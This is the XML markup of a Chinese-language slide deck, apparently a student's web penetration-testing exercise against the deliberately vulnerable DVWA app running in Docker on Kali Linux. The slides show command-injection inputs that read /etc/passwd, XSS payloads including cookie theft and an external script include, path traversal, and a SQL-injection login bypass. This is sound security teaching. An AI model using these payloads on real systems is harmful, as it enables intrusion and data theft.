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4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7D05-9113-4C81-BFDD-8EA3971894D9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4C8B4-E0A1-47A6-A427-48E979EBB0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00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1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25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140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83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38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016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30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646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401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520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63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69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403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40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39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983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08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44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80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677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643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67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848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363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888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313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856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512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177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6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04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8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22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1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710075" y="4925838"/>
            <a:ext cx="5683914" cy="4029040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="94775" tIns="47375" rIns="94775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04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2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0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6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網站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>滲透測試實務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DVWA測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>案例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學生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>董宸維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學號</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:A100E111</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>老師</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US"/>
              <a:t>曾</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>龍老師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717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進入 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 172.17.0.3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120" y="2120900"/>
            <a:ext cx="650375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7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 err="1" smtClean="0"/>
              <a:t>預設帳密</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>全部小寫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>):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Username: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>admin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Password: password</a:t>
            </a:r>
            <a:endParaRPr sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="168" name="Google Shape;168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2124364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68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要先設定資料庫</a:t>
            </a:r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739" y="2120900"/>
            <a:ext cx="748652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DVWA漏洞測試初體驗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4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701" y="210395"/>
            <a:ext cx="8218965" cy="62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490106" y="577563"/>
            <a:ext cx="3887932" cy="75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四種安全等級</a:t>
            </a:r>
            <a:endParaRPr b="1"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1386" y="2120900"/>
            <a:ext cx="530122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5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25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8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053" y="1849128"/>
            <a:ext cx="6331411" cy="48723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46415" y="781397"/>
            <a:ext cx="542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www.ksu.edu.tw;cat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; echoA100E111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7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測試型輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>::216.58.200.36;ls</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/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404" y="1579683"/>
            <a:ext cx="6708371" cy="48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0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測試型輸入::216.58.200.36; cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd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467" y="1609466"/>
            <a:ext cx="7049192" cy="51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1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測試環境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Kali linux + Docker +DVWA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06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SQLi injection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89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34" name="Google Shape;23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4124" y="1690689"/>
            <a:ext cx="4426080" cy="2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5104" y="3526234"/>
            <a:ext cx="4310246" cy="2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0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測試輸入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="242" name="Google Shape;242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42907"/>
            <a:ext cx="4267570" cy="28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7671" y="2868470"/>
            <a:ext cx="5277679" cy="372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11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Reflected Cross Site Scripting (XSS)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25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正常輸入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;25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2316" y="1500788"/>
            <a:ext cx="4365114" cy="296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066" y="3456813"/>
            <a:ext cx="6854318" cy="296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57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簡單的XSS payload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alert("XSS!");&lt;/script&gt;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&lt;script&gt; alert(document.cookie)&lt;/script&gt;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&lt;iframe width=333 height=333 src=tw.yahoo.com&gt; &lt;/iframe&gt;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000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測試型輸入::輸入XSS payload</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="273" name="Google Shape;2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8723" y="2078615"/>
            <a:ext cx="7370543" cy="32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2893705" y="1429079"/>
            <a:ext cx="49782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輸入&lt;script&gt;alert(/xss/)&lt;/script&gt;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598" y="3751552"/>
            <a:ext cx="7608667" cy="2778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140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練習使用底下技術測試看看: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https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr sz="2000"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748723" y="1576244"/>
            <a:ext cx="7886700" cy="54812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&lt;SCRIPT SRC=http://xss.rocks/xss.js&gt;&lt;/SCRIPT&gt;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124364"/>
            <a:ext cx="7730398" cy="43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37" y="4716892"/>
            <a:ext cx="8624236" cy="136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692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64837" y="625296"/>
            <a:ext cx="8003308" cy="92333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javascript:/*--&gt; &lt;/title&gt;&lt;/style&gt;&lt;/textarea&gt;&lt;/script&gt;&lt;/xmp&gt;&lt;svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'&gt;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19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&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="298" name="Google Shape;298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1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6012295" cy="891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在Kali Linux 安裝Docker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[1]設定 Docker APT repository (Kali is based on Debian):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echo 'deb [arch=amd64] https://download.docker.com/linux/debian buster stable' &gt; /etc/apt/sources.list.d/docker.list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[2]更新APT:    apt-get update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[3]安裝 Docker:先移除舊版的{如果之前有安裝}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remove docker docker-engine docker.io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[4]再安裝 Docker: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apt-get install docker-ce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[5]測試看看是否成功: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docker run hello-world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97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Stored Cross Site Scripting (XSS)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17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047423" cy="87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測試型輸入</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="313" name="Google Shape;31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12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20" name="Google Shape;32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Inclusion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30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點選看看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網址欄</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>會有甚麼變化</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="335" name="Google Shape;33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07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page=../../../../../../etc/passwd</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="Google Shape;342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427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893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Brute Force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="357" name="Google Shape;357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399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不必暴力破解也行::admin' #</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="364" name="Google Shape;364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20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啟動docker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installation, Docker service will be started, but not enabled (i.e. it will not be started automatically after reboot). To start it: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start docker</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="00B0F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To start Docker automatically upon reboot (do it on your own risk!):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>
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>systemctl enable docker</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill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46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430624" y="662271"/>
            <a:ext cx="73833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查看使用的版本   docker version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430624" y="5209801"/>
            <a:ext cx="8406049" cy="119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/>
              <a:t>更多docker指令請參閱</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>https://philipzheng.gitbooks.io/docker_practice/content/</a:t>
            </a:r>
            <a:endParaRPr sz="2800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1158605" y="1674152"/>
            <a:ext cx="3982244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stop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image ls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⮚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281408" y="3770807"/>
            <a:ext cx="2922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檢視有多少已下載的images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7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58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Google搜尋dvwa docker</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="138" name="Google Shape;13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4786" y="1831440"/>
            <a:ext cx="6972198" cy="451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59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94575" y="214219"/>
            <a:ext cx="84506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下載image:: docker pull XXXXX/YYYY</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="145" name="Google Shape;14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497" y="1690689"/>
            <a:ext cx="8190853" cy="3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657931" y="5387171"/>
            <a:ext cx="73478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pull vulnerables/web-dvwa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61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277668" y="115745"/>
            <a:ext cx="1375641" cy="106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啟動</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Google Shape;154;p9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1046126"/>
            <a:ext cx="77764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 -p 80:80 -t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vulnerables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/wed-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dvwa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8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391" y="2120900"/>
            <a:ext cx="699321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0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木刻字型</Template>
  <TotalTime>22</TotalTime>
  <Words>387</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>106</Paragraphs>
  <Slides>38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Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>微軟正黑體</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>標楷體</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Rockwell</vt:lpstr>
      <vt:lpstr>Rockwell Condensed</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>木刻字型</vt:lpstr>
      <vt:lpstr>網站滲透測試實務 DVWA測試案例</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>在Kali Linux 安裝Docker</vt:lpstr>
      <vt:lpstr>啟動docker</vt:lpstr>
      <vt:lpstr>更多docker指令請參閱  https://philipzheng.gitbooks.io/docker_practice/content/</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Google搜尋dvwa docker</vt:lpstr>
      <vt:lpstr>下載image:: docker pull XXXXX/YYYY</vt:lpstr>
      <vt:lpstr>啟動</vt:lpstr>
      <vt:lpstr>進入 dvwa 172.17.0.3</vt:lpstr>
      <vt:lpstr>預設帳密(全部小寫): Username: admin Password: password</vt:lpstr>
      <vt:lpstr>要先設定資料庫</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>四種安全等級</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36;ls</vt:lpstr>
      <vt:lpstr>測試型輸入::216.58.200.36; cd .. &amp;&amp; cd ..&amp;&amp; cat /etc/passwd</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>測試輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>正常輸入</vt:lpstr>
      <vt:lpstr>簡單的XSS payload</vt:lpstr>
      <vt:lpstr>測試型輸入::輸入XSS payload</vt:lpstr>
      <vt:lpstr>練習使用底下技術測試看看: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>&lt; “&gt;&lt;/iframe&gt;&lt;script&gt;alert(123)&lt;/script&gt; &lt;body onLoad=”while(true) alert(‘XSS’);”&gt; ‘”&gt;&lt;/title&gt;</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>測試型輸入</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>點選看看網址欄會有甚麼變化</vt:lpstr>
      <vt:lpstr>page=../../../../../../etc/passwd</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>Brute Force</vt:lpstr>
      <vt:lpstr>不必暴力破解也行::admin' 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網站滲透測試實務 DVWA測試案例</dc:title>
  <dc:creator>user</dc:creator>
  <cp:lastModifiedBy>owner</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-17T06:23:30Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-24T13:20:45Z</dcterms:modified>
</cp:coreProperties>
</file>